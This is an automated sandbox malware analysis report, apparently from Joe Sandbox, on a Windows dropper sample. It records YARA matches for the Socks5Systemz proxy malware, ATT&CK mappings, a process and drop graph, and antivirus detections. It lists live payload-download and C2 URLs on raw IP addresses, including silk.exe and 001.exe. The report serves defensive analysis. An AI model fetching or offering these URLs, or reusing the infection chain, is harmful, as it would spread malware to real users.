            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00458670 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,8_2_00458670
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_0041F300 GetSystemTimeAdjustment,_errno,QueryPerformanceFrequency,0_2_0041F300
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00455644 GetUserNameA,8_2_00455644
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: 7_2_00405CF4 GetVersionExA,7_2_00405CF4
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Socks5Systemz
            Source: Yara matchFile source: 0000000A.00000002.2564405418.0000000002DC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2564318893.0000000002D23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: photorecoverylib.exe PID: 9140, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Socks5Systemz
            Source: Yara matchFile source: 0000000A.00000002.2564405418.0000000002DC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2564318893.0000000002D23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: photorecoverylib.exe PID: 9140, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,10_2_609660FA
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,10_2_6090C1D6
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,10_2_60963143
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,10_2_6096A2BD
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,10_2_6096923E
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,10_2_6096A38C
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,10_2_6096748C
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,10_2_609254B1
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,10_2_6094B407
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6090F435 sqlite3_bind_parameter_index,10_2_6090F435
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,10_2_609255D4
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_609255FF sqlite3_bind_text,10_2_609255FF
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,10_2_6096A5EE
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,10_2_6094B54C
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,10_2_60925686
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,10_2_6094A6C5
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,10_2_609256E5
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,10_2_6094B6ED
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6092562A sqlite3_bind_blob,10_2_6092562A
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,10_2_60925655
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,10_2_6094C64A
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,10_2_609687A7
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,10_2_6095F7F7
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,10_2_6092570B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,10_2_6095F772
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,10_2_60925778
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6090577D sqlite3_bind_parameter_name,10_2_6090577D
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,10_2_6094B764
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6090576B sqlite3_bind_parameter_count,10_2_6090576B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,10_2_6094A894
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,10_2_6095F883
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,10_2_6094C8C2
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,10_2_6096281E
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,10_2_6096583A
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,10_2_6095F9AD
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,10_2_6094A92B
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6090EAE5 sqlite3_transfer_bindings,10_2_6090EAE5
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,10_2_6095FB98
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,10_2_6095ECA6
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,10_2_6095FCCE
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,10_2_6095FDAE
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,10_2_60966DF1
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,10_2_60969D75
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,10_2_6095FFB2

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Native API            		2
            LSASS Driver            		1
            Exploitation for Privilege Escalation            		11
            Disable or Modify Tools            		OS Credential Dumping11
            System Time Discovery            		Remote Services11
            Archive Collected Data            		12
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		2
            LSASS Driver            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory1
            Account Discovery            		Remote Desktop ProtocolData from Removable Media21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Service Execution            		24
            Windows Service            		1
            DLL Side-Loading            		4
            Obfuscated Files or Information            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            Bootkit            		1
            Access Token Manipulation            		21
            Software Packing            		NTDS46
            System Information Discovery            		Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script24
            Windows Service            		1
            DLL Side-Loading            		LSA Secrets251
            Security Software Discovery            		SSHKeylogging22
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		1
            File Deletion            		Cached Domain Credentials51
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            Masquerading            		DCSync2
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job51
            Virtualization/Sandbox Evasion            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Access Token Manipulation            		/etc/passwd and /etc/shadow3
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
            Process Injection            		Network Sniffing1
            System Network Configuration Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
            Bootkit            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1631991 Sample: 12321321.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 86 Antivirus detection for URL or domain 2->86 88 Antivirus detection for dropped file 2->88 90 Antivirus / Scanner detection for submitted sample 2->90 92 11 other signatures 2->92 9 12321321.exe 17 2->9         started        process3 dnsIp4 70 91.240.118.49, 443, 49697 GLOBALLAYERNL unknown 9->70 72 104.168.28.10, 49696, 49700, 49703 AS-COLOCROSSINGUS United States 9->72 52 c9f74e53-58d1-13d2-8abb-0195719b8be2.exe, PE32+ 9->52 dropped 54 1609a74d-2a2b-4f95-9570-07a864ac654e.exe, PE32 9->54 dropped 56 C:\Users\user\AppData\Local\...\silk[1].exe, PE32 9->56 dropped 58 C:\Users\user\AppData\Local\...\001[1].exe, PE32+ 9->58 dropped 98 Detected unpacking (changes PE section rights) 9->98 100 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 9->100 14 1609a74d-2a2b-4f95-9570-07a864ac654e.exe 2 9->14         started        17 c9f74e53-58d1-13d2-8abb-0195719b8be2.exe 1 9->17         started        file5 signatures6 process7 file8 64 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp, PE32 14->64 dropped 20 1609a74d-2a2b-4f95-9570-07a864ac654e.tmp 18 26 14->20         started        66 C:\Users\user\AppData\...\d.ghSlh.exe (copy), PE32+ 17->66 dropped 78 Antivirus detection for dropped file 17->78 80 Multi AV Scanner detection for dropped file 17->80 82 Writes to foreign memory regions 17->82 84 3 other signatures 17->84 23 vbc.exe 7 6 17->23         started        signatures9 process10 dnsIp11 42 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 20->42 dropped 44 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 20->44 dropped 46 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 20->46 dropped 50 21 other malicious files 20->50 dropped 27 photorecoverylib.exe 20->27         started        68 127.0.0.1 unknown unknown 23->68 48 C:\Windows\Temp\Hmas5kDc_8664.sys, PE32+ 23->48 dropped 94 Adds a directory exclusion to Windows Defender 23->94 96 Sample is not signed and drops a device driver 23->96 31 powershell.exe 23 23->31         started        34 powershell.exe 23 23->34         started        file12 signatures13 process14 dnsIp15 74 176.113.115.96, 443, 49728, 49730 SELECTELRU Russian Federation 27->74 76 193.176.153.180, 2024, 49729, 49732 AGROSVITUA unknown 27->76 60 C:\ProgramData\PhotoRecoveryLib\sqlite3.dll, PE32 27->60 dropped 62 C:\ProgramData\...\PhotoRecoveryLib.exe, PE32 27->62 dropped 102 Loading BitLocker PowerShell Module 31->102 36 conhost.exe 31->36         started        38 WmiPrvSE.exe 31->38         started        40 conhost.exe 34->40         started        file16 signatures17 process18

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            12321321.exe76%ReversingLabsWin64.Trojan.Generic
            12321321.exe73%VirustotalBrowse
            12321321.exe100%AviraTR/Dldr.Agent.uwcxt

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\001[1].exe100%AviraTR/Kryptik.zlcio
            C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exe100%AviraTR/Kryptik.zlcio
            C:\ProgramData\PhotoRecoveryLib\sqlite3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\001[1].exe73%ReversingLabsByteCode-MSIL.Trojan.Zilla
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\silk[1].exe8%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\Qt5Concurrent.dll (copy)4%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\Qt5PrintSupport.dll (copy)4%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\icuin51.dll (copy)2%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\icuuc51.dll (copy)0%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-6EQIQ.tmp4%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-7OE1I.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-AD2UI.tmp4%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-GR71V.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-HOEOG.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-MLBF0.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-MS967.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-PG511.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-VMOUV.tmp2%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\libEGL.dll (copy)0%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\libGLESv2.dll (copy)0%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\msvcp100.dll (copy)0%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\msvcr100.dll (copy)0%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\sqlite3.dll (copy)0%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\uninstall\is-DH20J.tmp3%ReversingLabs
            C:\Users\user\AppData\Local\Photo Recovery Library 5.7\uninstall\unins000.exe (copy)3%ReversingLabs
            C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exe8%ReversingLabs
            C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exe73%ReversingLabsByteCode-MSIL.Trojan.Zilla
            C:\Users\user\AppData\Local\Temp\d.ghSlh.exe (copy)73%ReversingLabsByteCode-MSIL.Trojan.Zilla
            C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmp3%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-B3MMC.tmp\_isetup\_iscrypt.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-B3MMC.tmp\_isetup\_setup64.tmp0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\is-B3MMC.tmp\_isetup\_shfoldr.dll0%ReversingLabs
            C:\Windows\Temp\Hmas5kDc_8664.sys54%ReversingLabsWin64.Trojan.Generic

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://91.240.118.49/forsale/silk.exeC:0%Avira URL Cloudsafe
            http://104.168.28.10/data/001wu0%Avira URL Cloudsafe
            http://104.168.28.10/data/001GPROFILE0%Avira URL Cloudsafe
            http://104.168.28.10/data/001M0%Avira URL Cloudsafe
            http://104.168.28.10/data/001:0%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f852a1cec7a86d87bdb6546ad12dac02900%Avira URL Cloudsafe
            http://www.micom/pkiops/Docs/ry.htm00%Avira URL Cloudsafe
            https://nanoways.com/activate0%Avira URL Cloudsafe
            http://104.168.28.10/data/001D0%Avira URL Cloudsafe
            https://176.113.115.96/allowedCert_OS_10%Avira URL Cloudsafe
            http://crl.microsZ0%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f926d19fe6595cd66946851e91fcd85241ab258d81029326be8ee43a8f51f8a95b5cd212a91f953c588fb52d6db9f51a9a0a29d5954cad713479a672918d4348dd7d493554dc90%Avira URL Cloudsafe
            https://91.240.118.49/forsale/silk.exeRRC:0%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f862a1cec7a86d87bdb6546ad12dac02900%Avira URL Cloudsafe
            http://104.168.28.10/data/00110%Avira URL Cloudsafe
            https://91.240.118.49/forsale/silk.exea0%Avira URL Cloudsafe
            https://91.240.118.49/forsale/silk.exeU0%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb388926d19fe6595cd66946951e91fcd852000%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb389926d19fe6595cd66946951e91fcd852000%Avira URL Cloudsafe
            https://nanoways.com/deactivate/?prefill=%hs0%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38b926d19fe6595cd66946951e91fcd852000%Avira URL Cloudsafe
            https://91.240.118.49/forsale/silk.exe?100%Avira URL Cloudmalware
            http://104.168.28.10/data/001o0%Avira URL Cloudsafe
            http://104.168.28.10/data/001w0%Avira URL Cloudsafe
            https://91.240.118.49/forsale/silk.exe100%Avira URL Cloudmalware
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f926d19fe6595cd66946851e91fcd852410%Avira URL Cloudsafe
            http://104.168.28.10/001.exe100%Avira URL Cloudmalware
            http://nanoways.com/check/%hs0%Avira URL Cloudsafe
            http://104.168.28.10/data/001_0%Avira URL Cloudsafe
            https://176.113.115.96/M320%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38f872a1cec7a86d87bdb6546ad12dac02900%Avira URL Cloudsafe
            https://176.113.115.96/F0%Avira URL Cloudsafe
            https://nanoways.com/qr/%10%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38b926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd0%Avira URL Cloudsafe
            https://176.113.115.96/ai/?key=8f3f2b3ae115416b731ce2a8231678fbb38c926d19fe6595cd66946951e91fcd852008e318dc05672e26e6fd09b4a144c9c4e9976278d7f0449ad5f64dd7cc9f4badbff4c50d15918a5449d3323240976481d5d5905c4bcf773cfcdd0%Avira URL Cloudsafe
            https://176.113.115.96/C0%Avira URL Cloudsafe
